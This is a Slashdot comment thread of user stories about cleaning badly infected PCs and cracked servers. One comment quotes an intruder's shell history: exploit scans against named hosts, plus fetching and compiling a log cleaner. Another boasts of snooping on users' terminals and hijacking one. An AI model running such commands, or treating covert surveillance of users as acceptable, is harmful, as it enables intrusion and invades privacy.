Worst Security Clean-Up You've Performed? 158
nakhla writes "Last night, I was tasked (by my wife) to help fix her friend's computer. It is a Windows XP home system which has been running slowly, almost to the point of un-usability (like *that's* never happened before). It turns out that hundreds of random processes had filled up its meager 256 MB of RAM. The cause? Nearly 7,500 viruses and worms that had infected the system. That number doesn't even include the hundreds of spyware and adware programs that had installed themselves, as well. Although the box is now behind a firewall, that wasn't always the case. This was, by far, the most infected system I'd ever seen, but I'm sure it can't be the worst ever. What was the worst security cleanup you ever had to perform?"
Well, there was that one time... (Score:5, Funny)
Re: (Score:3, Funny)
A friend of mine had that same thing happen once, it started to infect other machines around it; we had to nuke the site from orbit... it was the only way to be sure...
Re: (Score:2)
Did you salt the earth so nothing would grow there again?
AOL CDs are better than salt for that! (Score:2)
We found that sowing AOL CDs instead of salt was the most cost-effective solution.
You Cleaned it Up? (Score:5, Insightful)
Hell, i do a reinstall if I get even 1 bad virus..
Re: (Score:2)
Re: (Score:2)
I had one machine that A friend needed cleaned up. If i left the explorer shell running, it would lock up after 90 sec. (Once it got logged in). I had to kill the shell imediatly.
I managed to reinstall the network stack and drivers and load fire fox from my usb key. 2 spyware scanners failed to even load and the 3rd counted 7000 infected registry keys before it locked up. The task list of running programs was huge and they were all fi
Re: (Score:2)
Usually if you know enough about windows and the way the viruses/malware attack the OS you CAN clean it all off, it is a matter of how much time to do you want to spend cleaning it VS how much time it would take to re-install the OS and programs/restore files...
My cut off point is about 3 hours, this is also why I like to make ghost images of the OS after a fresh install and patch job, that way you cut down your time considerably for the next clean (
Re:You Cleaned it Up? (Score:5, Interesting)
The machine was about a year old (and out of warranty, of course) - a 2.6 gig cpu with a gig of ram. It took almost 35 minutes to go from power off to the desktop. They had an antivirus that came with the machine, but the "free 90 day subscription" to it had run out long and they weren't aware of it, since that was one of the first things the malware went after. Their 16 year old son who loved to surf porn all the time didn't help matters. A machine like that really isn't worth the time to hunt and peck for individual pieces of malware and should wiped clean and started fresh, however the godawful shit that was on it even hosed the recovery partition. And since actual install media isn't included with a $MAJORMANUFACTURER machine, they would have had to shell out for a retail copy of their previous OS.
Since these folks were obviously pretty cluless about computers, I fired them up a knoppix CD to see how they took to it. They honestly had zero problems navigating the KDE desktop and were able to do everything they wanted with the computer, except obviously to save stuff.
They now have a shiny Debian Etch based KDE desktop that they're enjoying, virus, malware, and calls from the ISP free.
That was one of the worst I've ever seen.
I WANT THAT ISP!!!!! (Score:2)
I'm getting DNS poisoning attacks about 300 times a day from a RR.COM cable modem address and RR says they can't do anything about it.
The attacks aren't actually working, but it still peeves me mightily.
Re: (Score:2)
Re: (Score:2)
Of course they CAN do something about it, they just choose not to, something about profit margins i'm sure...
My ISP called me recently :-( (Score:2)
20k (Score:1)
Re: (Score:2)
Ewido came up with a final score of 16553.
Took quite a long time to clean up.
Re: (Score:2, Funny)
P.S.: Anyone else see the humor in that this "Ask Slashdot" was posted right after the "Vista doesn't need Anti-virus" story?
...I'm just sayin'
A Corrupted SQL Server System (Score:3, Interesting)
Re: (Score:2)
A few gems. (Score:5, Interesting)
Geek Squad. One customer had 35,000 pieces of spyware and over 3000 instances of some 30 or 40 viruses on her computer, some of which required some alternative methods to remove since they were locked when in safe mode and encrypted so you couldn't scan with a boot CD. After 4 scans taking about 6 hours I managed to get the spyware gone, and also inbetween had made note of viruses I needed to manually purge. Cleaned it up nice; meanwhile my supervisor was telling me to call the customer and tell them we needed to just reinstall Windows.
My aunt got AOL with anti-spyware and firewall and security. Eventually she had 35 different viruses, managed to remove all but 28 unique signatures (this was before I developed my brute-force removal method). Chucked a ton of spyware too.
While at WhiteWolf Security, we had a little game going; eventually our opponents got pissed at us for unrelated reasons and decided to physically break into WhiteWolf at 4am. They shorted CMOS pins and used boot CDs to evade password lock-outs, adding extra administrative accounts and rootkits that continuously gave them remote log-ins. We couldn't feasibly assess the damage and determine all the changes; I filed an incident report with cost of infinite and put the machine in the evidence locker for forensics to deal with. We got third place too.
Re: (Score:2)
Of course, eventually spyware will take its toll again, and the vicious cycle repeats.
Re: (Score:2)
With Geek Squad you don't pay hourly. They do the service. For a Spyware removal it's $30, virus removal is ANOTHER $30 (...), then once you've removed all that if there's a problem you can just use the Windows install CD to REPAIR the system for another $20 (this includes Windows update). If they don't remove anything, they don't refund your money; but they will charge you $70 to back up any files and $60 to reinstall Windows, plus $30 per application to install any software you need back (Office, anti
I hate thinking about this one... (Score:5, Interesting)
I realized at that point that it wasnt worth cleaning it up, so I reinstalled with her manufacturers restore disk and rescanned it
I did the old woman a favor and installed my old unused retail copy of Win98 on the box.
Thats why you should never buy a computer from Rent-A-Center... *shudder*
Vomit (Score:5, Funny)
The worst? (Score:5, Funny)
web content file audits (Score:1)
XP, 128 megs... (Score:5, Insightful)
It was a mess a real mess.
5 minutes starting XP, 2 minutes seeing the window of Internet Explorer appear. 10-15 minutes to be able to download Spybot and AVG. 3 hours running spybot (you read me right).
The hard drive stayed constantly ON during all that time. Then I said Screw That, and I reinstalled.
My conclusions after 3 hours:
- The first and biggest threat all the newbie users have on their computer are OUTDATED norton utilities giveaways they got with their machine. They THINK they are protected, but they closed the "renew" window so often they forgot it's there. Either the software is FREE AND CONTINUOUS, or it's not there, capiche? Avg is excellent, there are many other free ones too... just find one and be happy. Not something that's NOT free.
- The second biggest threat are Norton Security centers, again outdated, again with useless popups. Again with people finding it nagging and deactivating it, making certain not only the Windows Firewall is properly deactivated by Norton's presence, but that their system is totally uselessly unprotected. Very great, coming from a security company. Again, there are many FREE (beer) softwares that do spyware detection and stuff, and Windows Firewall, in all its eloquence, is still better than a kick in the butt, at least compared to the useless deactivated softwares I found.
Not that I hate norton, that is
Then, even if you got years of pro experience in computers, people trust only one person, and if it's not you, you're d00med. I have been explaining to them their meager 128 megs of memory was not enough.... to no avail, they wanted to change computers, almost bought a new one, then another member of my family told them the exact same thing I did, now they have 512 megs and it's screaming. "told you so" was the only answer I could say. Oh well.
Re: (Score:2)
Uh.. no. The first and biggest threat all the newbie users have on their computer, is whatever appplication they're using, which is downloading and executing viruses! Viruses don't "just happen", even with a very naive user; viruses only happen if some application designer goes to the extra trouble to support them by giving them a "click here to run virus" GUI.
An
Re: (Score:2)
Re: (Score:2)
This kind of thing really upsets me, because no matter how much you try to educate people, someone is going to click it and then bang, another exploit is launched. It shouldn't have been so easy for a system to be compromised, but it is. Maybe Vista will solve this, but wasn't the same said of XP?
Norton must die! (Score:1)
Having said that, a large proportion of these systems had some form of Norton AV installed, and EVERY SINGLE ONE had a virus subscription which had lapsed. Entirely useless in protecting those computers.
HOW did you clean it up? (Score:4, Interesting)
But, I must ask, how on earth do you guys perform these kinds of clean-ups?
Most spyware that I have seen in the last months are rootkits. They hide underneath the kernel, are impossible to delete and "reinject" themselves upon reboot. I've even seen spyware which injects malicious code and/or replaces the main Windows binaries (explorer.exe, taskmgr.exe, cmd.exe, notepad.exe, etc.) How would you deal with these buggers?
When I come to a spywared computer, I start by running Spybot, AdAware and then AVG AntiVirus (to check for viruses/trojans). I would say that this technique is successful about 50% of the time. If it's not, I consider the situation disastrous and ask the person to do backups and go for a reformat.
I've even touched computer which froze upon startup (Windows boots up and everything freezes up). What would you do in these cases? I boot a livecd to do backups of a drive before the reformat.
So once again, Slashdotters, how do you guys get rid of these nasty rootkit and evolved spywares which can hide very well without reformatting?
Re: (Score:3, Insightful)
Nobody can completelly clean a virus infected system. The ones that claim they did, didn't, but don't know enough about the subject to know they didn't.
To put it bluntly, computer security is like virginity. You either are or you aren't. If somehow, at any time, an "evil" binary run on your system, then the system may be in control of whoever wrote that binary in any number of ways.
Re:HOW did you clean it up? (Score:4, Informative)
You don't. It is not worth the time and effort unless your personal / professional time has zero value. Get your data off and reinstall / restore from image.
Otherwise (if you are getting paid well for it) you can boot off a live CD or install the drive as a second in another system (one that has all the autorun crap disabled), Run AV/AS(pyware) on the drive, edit the registry removing all the startup items that you know isn't needed, run md5 comparisons on all the system files, and go from there. Dumping the registry and comparing with a known good registry is helpful at spotting crap.
Re: (Score:2)
1) Like most people, I typically run an Antivirus application, Ad-Aware and Spybot SD to see what sort of spyware I can remove. I disable network access as well, so the software cannot re-download itself or other malware. Most of w
Re: (Score:2)
Re:You Cleaned it Up? (Score:1)
Next time I reinstall Windows I'm going to Ghost the drive once I've got set up how I like it.
Good Ol' SunOS (Score:5, Interesting)
When I took over the machine I started lobbying the boss to let me do some security work on it and he'd never let me do it. We gave used FULL SHELL ACCESS. Compilers included. Oh and SunOS didn't even have shadow passwords by default!
Anyway, a few months into that someone changed the MOTD to some racist statement. That's when the boss finally let me do stuff.
But he wouldn't let me reinstall the thing. OR take shell-access away.
It was a constant battle. Every day I'd show up and look for what they did TODAY, and fix it. just try to stay ahead of them, and they tried to stay ahead of me...
Sometimes I'd stay up at night and ttysnoop on them talking to their other friends on IRC. Then I'd sigsev their IRC client, and watch them log back on and complain about how the sysadmin can't even keep IRC from segfaulting randomly. Then I'd take over their terminal and start saying crap about the other people he was talking to, until his friends kickbanned the hell out of him. Haha.
I eventually managed to let the boss allow me to replace the shell with a restricted shell (ok, a shell replacement I wrote in perl - it was easier than reading the manpage for rksh).
So basically the point was to make it not worth their while to break into my server.
Eventually this kid started DOSing us. We had a small 64K line to the 'real' internet, and he was on a DS3 in some university in Sweden. Our uplink (UUnet) said they couldn't do anything. Yay. So one day my boss (not the big boss) goes "hey, didn't you say they brag about this stuff on IRC?" I said "Yeah" and he goes "Teach me how to use IRC!!!"
The guy figured out IRC, found some 'hacker' channels, and FOUND THE GUY who was bragging about DOSing us. Started talking to him, getting kinda friendly. Guy starts blackmailing us - said that unless we give him a machine with his own harddrive (he demanded at least 4 gigs) or he'd DOS us again. So we gave it to him to see what he'd do. he filled it up with warez (gah) fairly fast, and then had to download it all with a 28.8K modem...
so my boss goes "Hey...why don't you come in and bring a harddrive and we'll copy it for you?"
And the guy did it. He came into our office. Where I had an IndyCam setup for him. And where we had a PI waiting outside to follow him home. And of course he brought his harddrive which we copied everything off, including his master host/password list.
The kid was 15, so we couldn't sue him or anything. But we did get a LOT of info about him. My boss basically went through all the guy's hosts and nuked them or, if they seemed legit, changed his passwords and Emailed the admins. And some of these were machines belonging to some pretty big cracker/hacker/whatever rings. We nuked those, too.
I like to think that was a pretty good security clean-up. We got rid of a LOT of bad-guy hangouts at that point.
Oh, and I was no longer with that company, but when that kid turned 18, they got him thrown in jail. That was fun, too.
Re: (Score:2)
Remember, this was 10 years ago. And not in the US.
Re: (Score:2)
Re: (Score:2)
You could be correct, of course, but I didn't interpret it the same as you.
Re: (Score:2)
I had a Bachelor's degree before my 19th birthday.
Real Player (Score:5, Funny)
I once tried to uninstall Real Player, but I was not successful so I guess it does not count.
You're probably not looking for this one (Score:3, Interesting)
My last encounter with a virus was when my brother (who had been abroad) came home, and a few days later I got an email from him with an executable in it. I downloaded the executable and found
Seriously. I didn't even have the free version of Ad-Aware installed until late 2004, and when I ran it I had lots of tracking cookies... that was all.
I do heavy development in Visual Studio, but only for consulting work. The rest I do in linux. I've never had a problem. I admin lots of systems, and I've seen rootkits on Solaris, but I've been lucky so far with all the linux servers I've looked at.
It's possible some of my mistakes weren't discovered until much later and no one bothered to tell me. But my own workstation has never been exploited. Sorry, hate to disappoint everyone, but I have nothing to tell.
Linux slapper was my worst (Score:1)
Was it running Vista? (Score:1, Offtopic)
This one time... (Score:1)
Re: (Score:2)
Seriously, ATHF is sometimes great and that is one of my favorite episodes.
W32.CIH (Score:1)
Comment removed (Score:5, Interesting)
Re: (Score:2)
The woman who wanted in-house service. (Score:5, Funny)
Re: (Score:2)
Didn't I see this story in a Jenna Jameson flick once?
Re: HOW did you clean it up? (Score:2)
I try all the good softwares... multiple times
Mostly, it depends on the usage.
In a company, with properly cared computers and correctly controlled environment... not a horrible control, only a minimal one, like telling people illegal things means losing their jobs, and non-job-related stuff are to be kept to a relative minimum (and no real enforcing o
Here's my toolkit... (Score:2, Informative)
I've been working in the small shop/repair business for over 5 years, and its a weekly experience to get a machine in with thousands of trojans, viruses and spy apps. In cases where a re-install may not be desirable or feasable, here's a list of the tools we use to find, isolate and eradicate hostile software.
Disclaimer: I do not work for any of these companies, nor am I been paid anything by them. I just find that these tools work. Your mileage may vary.
1: Antivirus
A
Chernobyl (Score:3, Interesting)
Re: (Score:2)
Re: (Score:2)
On April 26th a few years ago, a dental office I did work for called up saying they were having trouble booting their server. While trying to figure this out over the phone, the manager said, "Oh, by the way, we're having some problems with the 5 client machines."
Bing! Red flag. I googled on "virus April 26" and found Chernobyl. I told her there was a good chance the machines were toast.
Good outcome, though. The manager was anal about backing up their patient database (quite a l
Re: (Score:2)
I think, too, that too many inst
Sendmail, spam relay, posted AC for obvious reason (Score:2, Interesting)
I get on the horn the folks in the IT department. "Yo, d00dz, we finally got pwn3d."
"Not our problem."
"No, really. The reason the box is so slow is because we've run an open relay for (censored) months, and this dude from a (censo
remote linux reinstall, over dialup, from a mac (Score:2)
I used to run a server on the campus of a university.
Winter rolls around, and I left the university for winter break.
While travelling around, I got a call that indicated the server was sending a lot of mysterious traffic across the internet and "they" had unplugged it.
Well, that's not good...
Apparently I was the victim of a sendmail exploit. Alas. What can be done?
I had to call and direct the reinstallation of Redhat 4.2 remotely through the hands of a geology grad student until it was on the internet, then
tops me (Score:2)
Saddam Virus back in the early nineties (Score:2)
Re: (Score:2)
pffft (Score:2)
*adds a couple more pens to his pocket protector*
I cleaned it with dental floss and belly button lint.
Re: (Score:2)
Re: (Score:2)
Articles like this are great resources for information and in this case cleaning methods.
We are here to learn from eachother and share "war"stories.
Re: (Score:2)
Re: (Score:2)
some war stories (Score:5, Interesting)
I've delt with some nasty cases on linux though. Be forewarned, a lot of the twitchy sys admin types who believe in the "proper" way of doing things are going to be driven crazy by what follows.
Story 1: A visitor to my house needed to use ftp (ftp something TO me, for obscure reasons I have forgotten), and I temporarily turned on the ftp server on my Redhat 6.1 box on my cable modem. Later I noticed the machine running slow and a stuck process with a disguised name; grepping strings on the executable showed it to be an IRC server with built in commands that would DDOS people. Examination of logs showed I was cracked within three hours of turning that ftp server on. I was running tripwire, so I had a daily email showing what files had changed, but I had not been updating tripwire much, so I had to dig through lengthly lists to find out what new files had arrived and remove them. The computer that hacked mine was another RH 6.1 on a DSL in California, that was serving up web pages of pictures of salvage autos from a junkyard, all in spanish. I did not bother to contact them.
Story 2: About three years later, when RH 6.1 was pretty old, I was working for a guy who had a few remote RH 6.1 servers at his customer's sites around the country. They never connected to the internet, we dialed into them on the modem, thus no security worries, right ? Well, we had to make them dial out to an ISP and email us the IP address, because they changed their phone system and we temporarily couldn't dial into the remote machine, and that got cracked within a few hours. Examination of a few clues, which I have forgotten, lead me to conclude it had an Aurora root kit on it, which is a kernel module that the kernel reads in on bootup, that then filters all your ls and lsof and other commands to stop you from finding it or removing it. The solution I came up with was to go to an identical machine and compile an identical kernel, except with all modules built in and the ability to load modules turned off. The decision was made to make them mail us the harddrive back and we mailed them a replacement before I got to try it.
Story 3: a Debian server a different, later employer used was the NATing gateway, mail server, file server, essentially everything for a very small office. The boss-man either connected to it from an invested public terminal at a university, or it was brute-force ssh'd, not sure. It was compromised, and not noticed for months because the guy never did anything (this was confirmed by going back through backups and checking for when the key files appeared). I noticed it when I discovered I couldn't update something because someone had used chattr to make the file immutable, and of course that file was a trojan (it took me a while to figure that out). I booted up with a live CD to make sure no aurora type root kit was intefering with my access, and searched the entire disk for every immutable file (using lsattr and grep), and then hand-replaced the binaries used by apt-get and dpkg and friends, and then chrooted to the disk and did "apt-get --reinstall install packagename" for every compromised binary. I got the package name from "dpkg -S
I discovered a "hidden" directory (named with a single space character) that had tools to make random searches on yahoo and scrape the resulting pages for email addresses, and the spam had links to a fake bank login page, and the stuff to host that page was also there. As far as I could tell it was never unpacked and run. It was in a tar.gz with a script to unpack it and set it all up automatically.
He was running a package of two or three cobbled together sniffers and a compromised ssh
just finished recently (Score:5, Funny)
Re: (Score:2)
Re: (Score:2)
PHBs (Score:2)
Re: (Score:2)
1) nuke from orbit and
2) reinstall from known free sources (NO spy/adware supported items).
I think you mean to say:
1) Take off
2) Nuke the site from orbit
It's the only way to be sure.
I would've tried that, but I don't have any backups to restore the good stuff. Plus I'm rather short on the nukes, and the transport to orbit. Heck, I don't even have a Caterpillar Power Loa
A pretty bad one (Score:2, Interesting)
Found out the disk had 5k of space left on it. Checked and there was no antivirus, firewall or antimalware installed and it had been directly connected to a broadband line with a adsl modem for the last 3 months. And t
My worst... (Score:5, Interesting)
As I soon found out the broadband company had cut them off, since the computer was a breeding ground for virus and spam of all sorts. Why did they have so much problem, you ask? This is what I found.
No hardware firewall, one computer directly accessing the internet on a (albeit slow) broadband connection, no software firewall, no anti-virus program, no ad ware-removal program, outlook express and (actually!) a really old version of Firefox (0.3 I believe), all of it running on an unpatched version of Windows 98A.
It took me some time to clean that one out.
But it did impress me somewhat that the broadband company (Telia, Sweden) actually demanded proof that they had installed both anti virus and a firewall before they reactivated the connection. That is surprisingly good ethics for such a company, although it might be considered pure survival tactics, as the internet climate are today.
Re: (Score:2)
Re: HOW did you clean it up? (Score:3, Informative)
I know what I'll do next time.
Photocopy sorting nightmare (Score:3, Funny)
At the university I once had the job to produce 100 copies of a circa 100 page application document for a very important government funded research project.
I had a high-performance copier, to which I fed the original pages, cranked the lever to 100 copies and kept shoveling paper into it until it finished.
Only then I realized that I misunderstood the sort/collate switch and ended up with 10,000 sorted pages, meaning that 100 pages #1 were followed by 100 pages #2 etc.
I was out of fresh paper for a retry, too.
After some decent swearing and a couple of cigarettes, I arranged the tables of a seminar room around myself, then spent the whole night making 100 stacks of paper one by one.
When it was over, the skin on my fingers was so dry that it cracked and started bleeding. Not to speak of the over-exercised muscles in my hands...
Re: (Score:2)
Maybe anyway...
Bug Spray (Score:4, Funny)
Back in about 1993 (Score:3, Funny)
My PC is virus-free too, probably because it doesn't have a network card or modem, a surprisingly difficult combination to achieve when buying it. I gave up trying to spec a machine without ethernet and settled for opening up a brand new computer, pulling the unwanted card and binning it.
Re: Exchange, Outlook and Klez (Score:2)
IIRC that was SOP because there were some settings in Exchange that only a locally installed Outlook client could access. Now, I don't know if your admin actually needed to access any of those settings...
Sligtly on-topic (Score:3, Interesting)
* An excel spreadsheet showing the expenses for a french shoe manufacturer
* Someone's thesis on the spawning habits of canadian salmon (quite well written too, best of luck with the masters)
* A strange photograph of a person driving a car with a giant carrot for a passenger
* Someones 10Mb
* No porn whatsover, dissapointing
* An no password files, which I guess would have been a good primary target for the trojan.
Quality trojan, they don't write them like that anymore.
Script Kiddie Hunt (Score:3, Informative)
It was pretty good about cleaning up after its last logs, but I finally managed to stumble into the kiddie's home dir on my box... the damned kiddie forgot to clean up his
Looking at that (also Redhat 5.x) server's web site, I noticed that it had some evil users who exposed
So I cleaned up some other computer as well as mine. That was pretty much the time I migrated to Debian for good... haven't had nary a problem before or since.
Anyway, here are some annotated excerpts from the
blksheep/.bash_history
cd
cd
ls
ADMmountd liuxcentral.com -t 0 # plenty of typos while "scanning" for vulnerable hosts
ADMmountd linuxcentral.com -t 0
ADMmountd www.mondenet.com -t 0
# retrieving the logfile cleaning utility, which didn't work on
ftp goethe.sbu.edu
mv utclean.wri utclean.c
gcc utclean.c -o utlcean
mv utlcean
mv utlcean utclean
chmod +x utclean
# Testing his rootkit
who
ls
screen find / -name
ls
cat blah
rm blah
cat
Re: (Score:2)
Everyone knows Linux is invulnerable to attack!
You must be some kind of weird antimatter slashdot troll from the negativerse where the sky is white and the stars burn with the blackness of a thousand really really black things.
Wow (Score:2)
Well... (Score:3, Funny)
Just wipe it. Trust me (shudder), a boy should never see that side of his mom.
That was no doubt the worst cleanup I ever had to do.
Um, not quite.. (Score:2)
Re: (Score:2)
Vista and Allchin (Score:2, Funny)
6500+ infections (Score:2)
But probably the scariest was one I cleaned with 350 infections of one virus. I believe it was Chernobyl, but I might be wrong. On a certain date of the month it detonated, wiping the drive. I used it on the day before until around 11:55pm unknowingly and went to bed around midnight. I found it the day after it
Calling Sweden... (Score:2, Interesting)
Not the "worst" infection I've ever cleaned up, but certainly the weirdest!
Not as bad as it could have been, I guess (Score:2)
I thought it was some kind of record. But reading other posts, I guess it isn't.
Old times (Score:2)
I remember that few computer shops put out public computers to attract customers. These computers worked like this - you wen't to the shop with few floppies and copied games/software (mostly games) from and int
Two Words: (Score:2)
Blew up the whole data center. Oh, and asshats let the support on Netbackup lapse, so the restores wouldn't run until they fixed whatever problem they had. But they couldn't get support to help them until they got the CIO out of bed to sign a $250k PO for licensing and support.
All this happened because they didn't pay the invoice for ISS, and didn't get the Black Ice patch installed quickly enough.
Funny... I have severe asthma, and this was just the day they decided to paint the inside
Holy hell! (Score:2)
The worst I've seen is approximately 3500 spyware on a 1Ghz Win2k machine with 512M ram. It was SLOW. Like 15+ minutes to boot, slow. It took a good 5 hours to "clean" with adaware, and even then I decided to reinstall anyway due to the system retaining a great deal of instability.
Re: (Score:2)
You also have to factor in the time to backu
Cleanup method of the future (Score:2)
I think there's a third approach coming up, though it will be a few years before it's widespread. It's a variation on the first approach.
A quick summary: recopy the one Xen DomU image of the subsystem that has been infected. If most of your applications are installed in other domains, then you don't need to reinstall them. Needless to say, each Microsoft application should have a whole DomU dedicated to it. Maybe even have it run a freshly-copied image anytime the user clicks on the icon that starts it
Re: (Score:2)